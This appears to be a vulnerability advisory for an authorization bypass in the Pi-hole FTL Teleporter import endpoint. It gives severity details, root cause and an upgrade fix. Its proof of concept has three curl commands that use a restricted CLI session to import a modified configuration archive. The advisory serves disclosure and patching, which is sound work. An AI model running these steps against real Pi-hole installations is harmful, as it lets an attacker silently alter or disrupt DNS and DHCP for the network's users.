Summary
| Field | Value |
|---|---|
| CVE ID | CVE-2026-35491 |
| Advisory | GHSA-r7g8-3fj7-m5qq |
| Vulnerability Type | Authorization Bypass |
| CWE | CWE-863: Incorrect Authorization |
| Attack Vector | Local |
| CVSS v3.1 Base Score | 6.1 (Medium) |
| CVSS v3.1 Vector | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L |
| Affected Versions | Pi-hole FTL >= 6.0 through 6.5 |
| Patched Version | 6.6 |
| Discovered By | Mohammed Alzahrani |
Description
Pi-hole FTL versions 6.0 through 6.5 contain an authorization bypass in the Teleporter import endpoint. CLI-scoped API sessions — intended for read-only operations — are properly rejected by /api/config with HTTP 403, but the /api/teleporter endpoint lacks equivalent authorization checks.
This inconsistency allows an attacker with CLI credentials to import a Teleporter archive and modify Pi-hole’s configuration, despite the session type being restricted from direct config changes.
Impact
An attacker with CLI credentials can:
- Reconfigure Pi-hole — disable DNS blocking, change upstream DNS servers, alter DHCP settings
- Integrity violation — configuration changes take effect and trigger a system restart
- Availability impact — DNS resolution behavior can be silently altered or disrupted
Proof of Concept
Step 1 — Authenticate with CLI credentials to obtain a session ID:
curl -s -X POST 'http://<PIHOLE_IP>/api/auth' \
-H 'Content-Type: application/json' \
--data '{"password":"<cli_password>"}'
Step 2 — Confirm CLI session is blocked from direct config changes (expect HTTP 403):
curl -s -X PATCH 'http://<PIHOLE_IP>/api/config' \
-H 'Content-Type: application/json' \
-H 'X-FTL-SID: <session_id>' \
--data '{"dns":{"blocking":false}}'
# Returns: 403 Forbidden
Step 3 — Import a Teleporter archive using the same restricted session (succeeds):
curl -s -X POST 'http://<PIHOLE_IP>/api/teleporter' \
-H 'X-FTL-SID: <session_id>' \
-F 'file=@modified_config.tar.gz'
# Returns: 200 OK — configuration applied, system restarts
The import succeeds and configuration changes take effect, bypassing the authorization restriction enforced on /api/config.
Root Cause
The /api/teleporter endpoint does not check whether api->session->cli is true before processing import requests. The fix in v6.6 applies the same CLI session rejection logic used in /api/config to the Teleporter import handler.
Remediation
Update Pi-hole FTL to version 6.6 or later.
pihole -up
If immediate update is not possible, restrict access to the Pi-hole web interface and API to trusted network segments only.
References
Discovered and reported by Mohammed Alzahrani.